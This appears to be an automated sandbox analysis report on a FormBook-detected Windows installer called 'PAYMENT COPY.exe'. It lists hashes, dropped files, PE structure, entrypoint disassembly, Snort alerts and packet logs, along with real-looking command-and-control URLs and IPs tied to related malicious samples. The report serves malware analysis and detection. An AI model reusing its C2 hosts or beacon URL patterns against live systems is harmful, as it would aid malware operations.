                                                                • www.thegreenbattle.com/sb9r/?j2JhErl=WUvo38J/IHQ2cZDNQTpzQUKmli8iSC3X7FmX7RGR1rjI+erccOscsvK8+mo5h+9Qwsc2&NXf8l=AvBHWhTxsnkxJjj0
                                                                RFQ11_ZIM2021pdf.exeGet hashmaliciousBrowse
                                                                • www.yourdadsamug.com/hmog/?U48Hj=FlcsoMQcYP8bHmq4bYup7jQaOgohKV4/DEyixY4WMPM8LbmuXu036xGPxLAWg/kNnOBQ&wP9=ndsh-n6
                                                                1517679127365.exeGet hashmaliciousBrowse
                                                                • www.dollfaceextensionsllc.net/ct6a/?YP=fbdhu8lXTJZTH&LhN0T=92RjyhAwLwjL7yI7dz7K3gLd4uBg10QtxWOWXnGeU67JXFS1m9O45cTA73iQHOIfF2a9
                                                                W88AZXFGH.exeGet hashmaliciousBrowse
                                                                • www.oouuweee.com/klf/?VPXl=btTL_&ojPl=MYGgbBKqv4+u3e/kdP2Xd91vi4RM/aoA3smYuNxu5fW82Y1Oa+7PC+KK+eq77k+PBZt4nUhikw==
                                                                OC CVE9362 _TVOP-MIO 2(C) 2021,pdf.exeGet hashmaliciousBrowse
                                                                • www.shopvivreluxe.com/smzu/?IB=XIQ4zU3AjC42PFCTOO37iro6/VjVaWUNsZ/SuojON2epSeHv79IyId/eqrs49S5DR7zK&ndlpdH=xPJtZdZP
                                                                P1 032021.exeGet hashmaliciousBrowse
                                                                • www.handmadebyaspenhillfarm.com/mdi/?Y4pT-VJH=4epUEO0tHWTXkdIcuRd6Nq0v/RBz/qAjN33S7V6Z6YNQB3lA9BQkHpvYTzVx/n7sMWEr&bl=VTChTb7HLlUx2na

                                                                Domains

                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                shops.myshopify.comPayment advice IN18663Q0031139I.xlsxGet hashmaliciousBrowse
                                                                • 23.227.38.74
                                                                winlog.exeGet hashmaliciousBrowse
                                                                • 23.227.38.74
                                                                36ne6xnkop.exeGet hashmaliciousBrowse
                                                                • 23.227.38.74
                                                                Pd0Tb0v0WW.exeGet hashmaliciousBrowse
                                                                • 23.227.38.74
                                                                giATspz5dw.exeGet hashmaliciousBrowse
                                                                • 23.227.38.74
                                                                cV1uaQeOGg.exeGet hashmaliciousBrowse
                                                                • 23.227.38.74
                                                                CNTR-NO-GLDU7267089.xlsxGet hashmaliciousBrowse
                                                                • 23.227.38.74
                                                                IN18663Q0031139I.xlsxGet hashmaliciousBrowse
                                                                • 23.227.38.74
                                                                HG546092227865431209.exeGet hashmaliciousBrowse
                                                                • 23.227.38.74
                                                                Ref. PDF IGAPO17493.exeGet hashmaliciousBrowse
                                                                • 23.227.38.74
                                                                pumYguna1i.exeGet hashmaliciousBrowse
                                                                • 23.227.38.74
                                                                0BAdCQQVtP.exeGet hashmaliciousBrowse
                                                                • 23.227.38.74
                                                                TazxfJHRhq.exeGet hashmaliciousBrowse
                                                                • 23.227.38.74
                                                                AQJEKNHnWK.exeGet hashmaliciousBrowse
                                                                • 23.227.38.74
                                                                New Order.exeGet hashmaliciousBrowse
                                                                • 23.227.38.74
                                                                payment.exeGet hashmaliciousBrowse
                                                                • 23.227.38.74
                                                                BL836477488575.exeGet hashmaliciousBrowse
                                                                • 23.227.38.74
                                                                Order.exeGet hashmaliciousBrowse
                                                                • 23.227.38.74
                                                                PO.exeGet hashmaliciousBrowse
                                                                • 23.227.38.74
                                                                PO91361.exeGet hashmaliciousBrowse
                                                                • 23.227.38.74

                                                                ASN

                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                NINETRShttps://nl.raymondbaez.com/xxx/redirect/Get hashmaliciousBrowse
                                                                • 104.250.166.31
                                                                https://nl.largecanvasprints.com/sd/justGet hashmaliciousBrowse
                                                                • 104.250.166.28
                                                                CLOUDFLARENETUSPO NUMBER 3120386 3120393 SIGNED.exeGet hashmaliciousBrowse
                                                                • 1.2.3.4
                                                                Cobro Juridico_07223243630_5643594_539661009070075_49874359_5059639084170590400_7272781644_pdf.exeGet hashmaliciousBrowse
                                                                • 172.67.222.176
                                                                BL2659618800638119374.xls.exeGet hashmaliciousBrowse
                                                                • 172.67.222.176
                                                                Purchase order and quote confirmation.exeGet hashmaliciousBrowse
                                                                • 172.67.222.176
                                                                Confirm Order for SK TRIMS & INDUSTRIES_DK4571,pdf.exeGet hashmaliciousBrowse
                                                                • 172.67.188.154
                                                                Re Confirm#U00ffthe invoice#U00ffthe payment slip.exeGet hashmaliciousBrowse
                                                                • 104.21.17.57
                                                                SOA.exeGet hashmaliciousBrowse
                                                                • 104.21.19.200
                                                                RFQ No A'4762GHTECHNICAL DETAILS.exeGet hashmaliciousBrowse
                                                                • 104.21.19.200
                                                                GQ5JvPEI6c.exeGet hashmaliciousBrowse
                                                                • 104.21.17.57
                                                                setupapp.exeGet hashmaliciousBrowse
                                                                • 172.67.164.1
                                                                g2qwgG2xbe.exeGet hashmaliciousBrowse
                                                                • 172.67.161.4
                                                                C++ Dropper.exeGet hashmaliciousBrowse
                                                                • 104.21.50.92
                                                                12042021493876783,xlsx.exeGet hashmaliciousBrowse
                                                                • 23.227.38.65
                                                                JSTCG21040600210 xlxs.exeGet hashmaliciousBrowse
                                                                • 104.21.19.200
                                                                PAYMENT RECEIPT.exeGet hashmaliciousBrowse
                                                                • 172.67.188.154
                                                                PO5411.exeGet hashmaliciousBrowse
                                                                • 104.21.21.198
                                                                COMMERCIAL INVOICE N#U00c2#U00ba 0001792E21.exeGet hashmaliciousBrowse
                                                                • 104.21.17.57
                                                                9479_pdf.exeGet hashmaliciousBrowse
                                                                • 172.67.222.176
                                                                fyi.exeGet hashmaliciousBrowse
                                                                • 172.67.188.154
                                                                inv.exeGet hashmaliciousBrowse
                                                                • 104.21.73.99
                                                                OVHFRSwift copy.pdf.exeGet hashmaliciousBrowse
                                                                • 51.222.80.112
                                                                PO-4147074_pdf.exeGet hashmaliciousBrowse
                                                                • 51.195.53.221
                                                                kQVi54bTM0.exeGet hashmaliciousBrowse
                                                                • 5.196.102.93
                                                                cym4u.exeGet hashmaliciousBrowse
                                                                • 188.165.17.91
                                                                Statement-ID-(400603).vbsGet hashmaliciousBrowse
                                                                • 51.89.204.5
                                                                $108,459.00.htmlGet hashmaliciousBrowse
                                                                • 146.59.152.166
                                                                LtfVNumoON.exeGet hashmaliciousBrowse
                                                                • 144.217.30.204
                                                                giATspz5dw.exeGet hashmaliciousBrowse
                                                                • 142.4.204.181
                                                                SecuriteInfo.com.__vbaHresultCheckObj.21994.exeGet hashmaliciousBrowse
                                                                • 149.202.83.171
                                                                SecuriteInfo.com.Variant.Johnnie.321295.17359.exeGet hashmaliciousBrowse
                                                                • 91.121.140.167
                                                                fileshare.docGet hashmaliciousBrowse
                                                                • 188.165.245.148
                                                                SecuriteInfo.com.Variant.Bulz.421173.18141.exeGet hashmaliciousBrowse
                                                                • 51.89.77.2
                                                                R1210322PIR-2FQUOTATION(P21C00285).exeGet hashmaliciousBrowse
                                                                • 51.38.214.75
                                                                Notice of change schedule for CID_ CMA CGM AMBER 0QA8FS1NC 0QA8GN1NC - 1st Rev.pdf.exeGet hashmaliciousBrowse
                                                                • 51.195.53.221
                                                                Notice of change schedule for CID_ CMA CGM AMBER 0QA8FS1NC 0QA8GN1NC - 1st Rev.pdf_1.exeGet hashmaliciousBrowse
                                                                • 51.195.53.221
                                                                Purchase Order No.10056.exeGet hashmaliciousBrowse
                                                                • 51.195.53.221
                                                                Quotation_pdf.exeGet hashmaliciousBrowse
                                                                • 51.195.53.221
                                                                0L2qr7kJMh40sxq.exeGet hashmaliciousBrowse
                                                                • 66.70.204.222
                                                                One.exeGet hashmaliciousBrowse
                                                                • 94.23.66.110
                                                                ORDER-02188.exeGet hashmaliciousBrowse
                                                                • 178.33.222.243

                                                                JA3 Fingerprints

                                                                No context

                                                                Dropped Files

                                                                No context

                                                                Created / dropped Files

                                                                C:\Users\user\AppData\Local\Temp\5r6mhdppdaz
                                                                Process:C:\Users\user\Desktop\PAYMENT COPY.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):164864
                                                                Entropy (8bit):7.998981429104046
                                                                Encrypted:true
                                                                SSDEEP:3072:I3WMw/3B14lKQpzny0hgpmRZ+iwo0M2RsYnd3eTkNtoWzX9Za7Zk:I3WMw/4lKQpzyG+iwoL+sMduTezXIS
                                                                MD5:62B43B42F92CF148B8EB8A59E73992DE
                                                                SHA1:27464DA3E2727CC0D42A1E6CA5623944EA7D3010
                                                                SHA-256:64A4D031533B659211B8FC9DF85BEADFE13EF2C408D38DA11918DEFE4F349B6E
                                                                SHA-512:911D0FCBA1BC073DC897A5AEA9AEC6EB2D7D5CFA2AB67AA7BCBFBABD702A1D7978A52B0855AB221733E8002EF26D9D3DA43E40ACB99B19F0D5E4AE9FF09616A6
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview: ....\K..]2........&...3:,.{d1j.k......K........Y<.........c...M..~.........s....z.gY..1S.a...~l.?w...X......iG..n..Y.~....N8..l..}....O:...L...F..l...Gw..F.*...._....ca..I..L@CW%..F..5....5..:.6.....x.I..l.....v...<{.a.D.....2............*..!.X.,T%?..n.....m...[.n...=.o..?.....V....q..C........g....H6..p.......j....Q=.....B......c.6...*....d......n.:.@.....M.F<..Jn..........p.....>V.P}..P.x..@.d.lRmj....M.P.....lP..5u'f..I.....!4..f^W.....l......8....,.C.F...6..[.._4.K,..~.W..r..x~S...ye.........F.8.W.[|V.$A..MO....&s..S5.Ei....%..d.R....p.U<].g.(.4.........../.`....G..._!N.*.e.O.*...T..U@d.........B......1.=~>8...\._..F%+"7.$*}fU....q..D..2(..@d..)..9._../. u[BF..kf\N..H.Sm.._&...5K.......Uz.h,....(.U...h.......H.Ay..1.Z.3'5.z....._....4f.J...)...z..K..[....:..({..H..[d.C4 .`T....Pg.(..sg_.......#.W$...FR|V.......{%:..-s.5.....8.:.........b.EK.....0..V..z..CL(...uX{.\\/.Bi.$y&.,..._.....p._.{...IrU.=.....U..D.:0......j..'..s..A%*.~..Z\..2.
                                                                C:\Users\user\AppData\Local\Temp\jptmg4zdrr658q2oh
                                                                Process:C:\Users\user\Desktop\PAYMENT COPY.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):6661
                                                                Entropy (8bit):7.249328842909832
                                                                Encrypted:false
                                                                SSDEEP:192:Jmm1XTomqd+ObD+9d4z6CYkjwVxnaehbfcGPRIm8SMW:MmpomlObD+vxPpcOcSMW
                                                                MD5:5EE12EF6F6DB0B75AB71AF53A97168E5
                                                                SHA1:1285BFEFF889668A0D04CA92ADB13B406C22D06B
                                                                SHA-256:4CE4C5E11A7F609B99BD99B0EB22F315DB167600F181467FAEEEB68FE897728A
                                                                SHA-512:27623F48F2A02E34F207A9961645ED4914C66BED07167D0305DFA29636D157F8F6708DEB359CA35598AFE84755CD8F11698AF052A37320931A3A13E6879EB251
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview: ....a.J.......{....o...}.|.....J..J..r....w..zJ..%....wM....{..ep>..J....>.d.J."...>...J.b..>.c.J.....&..J....&.h.J.)...&..J.s.....u.J........J......p.J.4...&..J.t..&.s.J...........>.d...k>..J.*>.....k>.a.J..>_c...k&..J.-&F..k&.h.J..&gh...k.n.J.,....g.d....p.J.v....s.J.....&I.J....&.h.J.5...&..J.w..>.e.J.....>...J....>.`.J. ...&..J.`..&.c.J.....&..J.......t.J.3......u......c.~...&q..d...r.....&}.q...ws...v.ppp...~r..U...n.|||...~.1.'...n.xxx.....g..}.xy.{.}J.....0hB.....p.....q............|.J.....+.......x.J.....iin.....w3q{{..`e...X...o9}{{..a...~'.....}n.x.xJ..f%.<..e...by:{}}..`...f...K..s...r.!.{{......M...K...J..J.......f...z[..J.|J.}..tq....r.{.....qJx.J.......|JedJ..K.n{J.......Y..J.........Z..n[..{.z..f...g..n...n...|.|....|......y...`Y.x....{....e.......&{&...p..>q>.>p..ke......c..m...s.N......{y....{......c..............Aa..`.{..c..f|.....r..c..l.......8;x...cP..'...J..............r.P.......o...NR=||>.~{..y&......
                                                                C:\Users\user\AppData\Local\Temp\nsr3AA2.tmp\ek0j.dll
                                                                Process:C:\Users\user\Desktop\PAYMENT COPY.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):5632
                                                                Entropy (8bit):4.077323125673351
                                                                Encrypted:false
                                                                SSDEEP:48:a97yf72xMWZhfChEsHIGmEsH/Gt4BKiZ/seNkTHfav6yYZmEeSRuqSmHSnM:1AT4IGN4/GCBKxfQKuixNHSM
                                                                MD5:ACFD9B42770B735A036C3DEABC11FFFA
                                                                SHA1:FAD50F0007FDCC82F238F882DC2A25F448FC2E97
                                                                SHA-256:D6F47850D33B1801E309180394A5557804145DAEA4818B9F17FBEECAFD364EAC
                                                                SHA-512:02AD5BF95A690B0281FCB3E0F3D466C244443AA9AFC1592C74EF7E60B5914830B9630576F516532E0A92C69495CE24F89A937EA61A8CE7BF24642308FE608D34
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 4%
                                                                Reputation:low
                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........5K..fK..fK..f_..gZ..fK..fw..f...gJ..f...gJ..f..{fJ..f...gJ..fRichK..f........................PE..L...+.s`...........!......................... ...............................`............@.........................P ..P....1.......@.......................P......0 ...............................................0...............................code............................... ....data...|.... ......................@....idata.......0......................@..@.rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................................................................

                                                                Static File Info

                                                                General

                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                Entropy (8bit):7.904570189861365
                                                                TrID:
                                                                • Win32 Executable (generic) a (10002005/4) 92.16%
                                                                • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                File name:PAYMENT COPY.exe
                                                                File size:206697
                                                                MD5:0cdbfdf044cfa1d810ed06b745ac9cd9
                                                                SHA1:124e5c370a103888227112141ea559b85ae17656
                                                                SHA256:8d85a4dbf755253e9f46aafa65f5374431e5843e6d1fa6ab61ef238919d9f6bb
                                                                SHA512:69a23fa871044faf8c58f0a67f49b2d74d72b2880eb299144fd3ee854880f40fe50f14503ce0e320af3e661a9722bc7f20a4055a000fdf9b72e1f0aeba9f5793
                                                                SSDEEP:6144:HdiVOo3WMw/4lKQpzyG+iwoL+sMduTezXIi:MVl3Jw/NYzFwQN6mezXIi
                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d.H............,...........:...!........&......e.......Rich....................PE..L.....8E.................Z....9.....J1.....

                                                                File Icon

                                                                Icon Hash:b2a88c96b2ca6a72

                                                                Static PE Info

                                                                General

                                                                Entrypoint:0x40314a
                                                                Entrypoint Section:.text
                                                                Digitally signed:false
                                                                Imagebase:0x400000
                                                                Subsystem:windows gui
                                                                Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                DLL Characteristics:
                                                                Time Stamp:0x4538CD0B [Fri Oct 20 13:20:11 2006 UTC]
                                                                TLS Callbacks:
                                                                CLR (.Net) Version:
                                                                OS Version Major:4
                                                                OS Version Minor:0
                                                                File Version Major:4
                                                                File Version Minor:0
                                                                Subsystem Version Major:4
                                                                Subsystem Version Minor:0
                                                                Import Hash:18bc6fa81e19f21156316b1ae696ed6b

                                                                Entrypoint Preview

                                                                Instruction
                                                                sub esp, 0000017Ch
                                                                push ebx
                                                                push ebp
                                                                push esi
                                                                xor esi, esi
                                                                push edi
                                                                mov dword ptr [esp+18h], esi
                                                                mov ebp, 00409240h
                                                                mov byte ptr [esp+10h], 00000020h
                                                                call dword ptr [00407030h]
                                                                push esi
                                                                call dword ptr [00407270h]
                                                                mov dword ptr [007A3030h], eax
                                                                push esi
                                                                lea eax, dword ptr [esp+30h]
                                                                push 00000160h
                                                                push eax
                                                                push esi
                                                                push 0079E540h
                                                                call dword ptr [00407158h]
                                                                push 00409230h
                                                                push 007A2780h
                                                                call 00007F3604971EC8h
                                                                mov ebx, 007AA400h
                                                                push ebx
                                                                push 00000400h
                                                                call dword ptr [004070B4h]
                                                                call 00007F360496F609h
                                                                test eax, eax
                                                                jne 00007F360496F6C6h
                                                                push 000003FBh
                                                                push ebx
                                                                call dword ptr [004070B0h]
                                                                push 00409228h
                                                                push ebx
                                                                call 00007F3604971EB3h
                                                                call 00007F360496F5E9h
                                                                test eax, eax
                                                                je 00007F360496F7E2h
                                                                mov edi, 007A9000h
                                                                push edi
                                                                call dword ptr [00407140h]
                                                                call dword ptr [004070ACh]
                                                                push eax
                                                                push edi
                                                                call 00007F3604971E71h
                                                                push 00000000h
                                                                call dword ptr [00407108h]
                                                                cmp byte ptr [007A9000h], 00000022h
                                                                mov dword ptr [007A2F80h], eax
                                                                mov eax, edi
                                                                jne 00007F360496F6ACh
                                                                mov byte ptr [esp+10h], 00000022h
                                                                mov eax, 00000001h

                                                                Rich Headers

                                                                Programming Language:
                                                                • [EXP] VC++ 6.0 SP5 build 8804

                                                                Data Directories

                                                                NameVirtual AddressVirtual Size Is in Section
                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x73440xb4.rdata
                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x3ac0000x900.rsrc
                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IAT0x70000x280.rdata
                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                Sections

                                                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                .text0x10000x59de0x5a00False0.681293402778data6.5143386598IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                .rdata0x70000x10f20x1200False0.430338541667data5.0554281206IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                .data0x90000x39a0340x400unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                .ndata0x3a40000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                .rsrc0x3ac0000x9000xa00False0.409375data3.94574916515IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                Resources

                                                                NameRVASizeTypeLanguageCountry
                                                                RT_ICON0x3ac1900x2e8dataEnglishUnited States
                                                                RT_DIALOG0x3ac4780x100dataEnglishUnited States
                                                                RT_DIALOG0x3ac5780x11cdataEnglishUnited States
                                                                RT_DIALOG0x3ac6980x60dataEnglishUnited States
                                                                RT_GROUP_ICON0x3ac6f80x14dataEnglishUnited States
                                                                RT_MANIFEST0x3ac7100x1ebXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                                                Imports

                                                                DLLImport
                                                                KERNEL32.dllCloseHandle, SetFileTime, CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetFileSize, GetModuleFileNameA, GetTickCount, GetCurrentProcess, lstrcmpiA, ExitProcess, GetCommandLineA, GetWindowsDirectoryA, GetTempPathA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, lstrcmpA, GetEnvironmentVariableA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, SetErrorMode, GetModuleHandleA, LoadLibraryA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, CopyFileA
                                                                USER32.dllScreenToClient, GetWindowRect, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, EndDialog, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxA, CharPrevA, DispatchMessageA, PeekMessageA, CreateDialogParamA, DestroyWindow, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, TrackPopupMenu, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
                                                                GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
                                                                SHELL32.dllSHGetMalloc, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
                                                                ADVAPI32.dllRegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
                                                                COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                ole32.dllOleInitialize, OleUninitialize, CoCreateInstance
                                                                VERSION.dllGetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                                                                Possible Origin

                                                                Language of compilation systemCountry where language is spokenMap
                                                                EnglishUnited States

                                                                Network Behavior

                                                                Snort IDS Alerts

                                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                04/12/21-09:44:45.382473ICMP384ICMP PING192.168.2.62.23.155.186
                                                                04/12/21-09:44:45.417531ICMP449ICMP Time-To-Live Exceeded in Transit84.17.52.126192.168.2.6
                                                                04/12/21-09:44:45.418858ICMP384ICMP PING192.168.2.62.23.155.186
                                                                04/12/21-09:44:45.454300ICMP449ICMP Time-To-Live Exceeded in Transit149.11.89.129192.168.2.6
                                                                04/12/21-09:44:45.456656ICMP384ICMP PING192.168.2.62.23.155.186
                                                                04/12/21-09:44:45.492495ICMP449ICMP Time-To-Live Exceeded in Transit130.117.49.165192.168.2.6
                                                                04/12/21-09:44:45.492950ICMP384ICMP PING192.168.2.62.23.155.186
                                                                04/12/21-09:44:45.533869ICMP449ICMP Time-To-Live Exceeded in Transit130.117.0.18192.168.2.6
                                                                04/12/21-09:44:45.534473ICMP384ICMP PING192.168.2.62.23.155.186
                                                                04/12/21-09:44:45.581049ICMP449ICMP Time-To-Live Exceeded in Transit154.54.36.53192.168.2.6
                                                                04/12/21-09:44:45.581555ICMP384ICMP PING192.168.2.62.23.155.186
                                                                04/12/21-09:44:45.627831ICMP449ICMP Time-To-Live Exceeded in Transit130.117.15.66192.168.2.6
                                                                04/12/21-09:44:45.628741ICMP384ICMP PING192.168.2.62.23.155.186
                                                                04/12/21-09:44:45.698393ICMP449ICMP Time-To-Live Exceeded in Transit195.22.208.117192.168.2.6
                                                                04/12/21-09:44:45.698731ICMP384ICMP PING192.168.2.62.23.155.186
                                                                04/12/21-09:44:45.754598ICMP449ICMP Time-To-Live Exceeded in Transit93.186.128.39192.168.2.6
                                                                04/12/21-09:44:45.779814ICMP384ICMP PING192.168.2.62.23.155.186
                                                                04/12/21-09:44:45.835206ICMP408ICMP Echo Reply2.23.155.186192.168.2.6
                                                                04/12/21-09:45:38.392312TCP1201ATTACK-RESPONSES 403 Forbidden804971923.227.38.74192.168.2.6
                                                                04/12/21-09:45:43.519484TCP2031453ET TROJAN FormBook CnC Checkin (GET)4972380192.168.2.6104.21.28.135
                                                                04/12/21-09:45:43.519484TCP2031449ET TROJAN FormBook CnC Checkin (GET)4972380192.168.2.6104.21.28.135
                                                                04/12/21-09:45:43.519484TCP2031412ET TROJAN FormBook CnC Checkin (GET)4972380192.168.2.6104.21.28.135
                                                                04/12/21-09:46:27.541057TCP2031453ET TROJAN FormBook CnC Checkin (GET)4975280192.168.2.614.129.120.32
                                                                04/12/21-09:46:27.541057TCP2031449ET TROJAN FormBook CnC Checkin (GET)4975280192.168.2.614.129.120.32
                                                                04/12/21-09:46:27.541057TCP2031412ET TROJAN FormBook CnC Checkin (GET)4975280192.168.2.614.129.120.32

                                                                Network Port Distribution

                                                                TCP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Apr 12, 2021 09:45:38.186482906 CEST4971980192.168.2.623.227.38.74
                                                                Apr 12, 2021 09:45:38.227390051 CEST804971923.227.38.74192.168.2.6
                                                                Apr 12, 2021 09:45:38.229238987 CEST4971980192.168.2.623.227.38.74
                                                                Apr 12, 2021 09:45:38.229357958 CEST4971980192.168.2.623.227.38.74
                                                                Apr 12, 2021 09:45:38.270112991 CEST804971923.227.38.74192.168.2.6
                                                                Apr 12, 2021 09:45:38.392312050 CEST804971923.227.38.74192.168.2.6
                                                                Apr 12, 2021 09:45:38.392340899 CEST804971923.227.38.74192.168.2.6
                                                                Apr 12, 2021 09:45:38.392357111 CEST804971923.227.38.74192.168.2.6
                                                                Apr 12, 2021 09:45:38.392373085 CEST804971923.227.38.74192.168.2.6
                                                                Apr 12, 2021 09:45:38.392389059 CEST804971923.227.38.74192.168.2.6
                                                                Apr 12, 2021 09:45:38.392401934 CEST804971923.227.38.74192.168.2.6
                                                                Apr 12, 2021 09:45:38.392417908 CEST804971923.227.38.74192.168.2.6
                                                                Apr 12, 2021 09:45:38.392430067 CEST804971923.227.38.74192.168.2.6
                                                                Apr 12, 2021 09:45:38.392508030 CEST4971980192.168.2.623.227.38.74
                                                                Apr 12, 2021 09:45:38.392561913 CEST4971980192.168.2.623.227.38.74
                                                                Apr 12, 2021 09:45:38.392642021 CEST4971980192.168.2.623.227.38.74
                                                                Apr 12, 2021 09:45:43.478337049 CEST4972380192.168.2.6104.21.28.135
                                                                Apr 12, 2021 09:45:43.519201994 CEST8049723104.21.28.135192.168.2.6
                                                                Apr 12, 2021 09:45:43.519372940 CEST4972380192.168.2.6104.21.28.135
                                                                Apr 12, 2021 09:45:43.519484043 CEST4972380192.168.2.6104.21.28.135
                                                                Apr 12, 2021 09:45:43.560225964 CEST8049723104.21.28.135192.168.2.6
                                                                Apr 12, 2021 09:45:44.022630930 CEST4972380192.168.2.6104.21.28.135
                                                                Apr 12, 2021 09:45:44.063721895 CEST8049723104.21.28.135192.168.2.6
                                                                Apr 12, 2021 09:45:44.063839912 CEST4972380192.168.2.6104.21.28.135
                                                                Apr 12, 2021 09:45:49.197438002 CEST4973080192.168.2.6176.104.107.18
                                                                Apr 12, 2021 09:45:49.271003008 CEST8049730176.104.107.18192.168.2.6
                                                                Apr 12, 2021 09:45:49.271266937 CEST4973080192.168.2.6176.104.107.18
                                                                Apr 12, 2021 09:45:49.271539927 CEST4973080192.168.2.6176.104.107.18
                                                                Apr 12, 2021 09:45:49.344614983 CEST8049730176.104.107.18192.168.2.6
                                                                Apr 12, 2021 09:45:49.773139000 CEST4973080192.168.2.6176.104.107.18
                                                                Apr 12, 2021 09:45:49.777462006 CEST8049730176.104.107.18192.168.2.6
                                                                Apr 12, 2021 09:45:49.777493000 CEST8049730176.104.107.18192.168.2.6
                                                                Apr 12, 2021 09:45:49.777570963 CEST4973080192.168.2.6176.104.107.18
                                                                Apr 12, 2021 09:45:49.778981924 CEST4973080192.168.2.6176.104.107.18
                                                                Apr 12, 2021 09:45:49.845990896 CEST8049730176.104.107.18192.168.2.6
                                                                Apr 12, 2021 09:45:49.846148968 CEST4973080192.168.2.6176.104.107.18
                                                                Apr 12, 2021 09:45:54.990792990 CEST4974280192.168.2.6167.114.6.31
                                                                Apr 12, 2021 09:45:55.128532887 CEST8049742167.114.6.31192.168.2.6
                                                                Apr 12, 2021 09:45:55.128633976 CEST4974280192.168.2.6167.114.6.31
                                                                Apr 12, 2021 09:45:55.128757954 CEST4974280192.168.2.6167.114.6.31
                                                                Apr 12, 2021 09:45:55.265072107 CEST8049742167.114.6.31192.168.2.6
                                                                Apr 12, 2021 09:45:55.265363932 CEST8049742167.114.6.31192.168.2.6
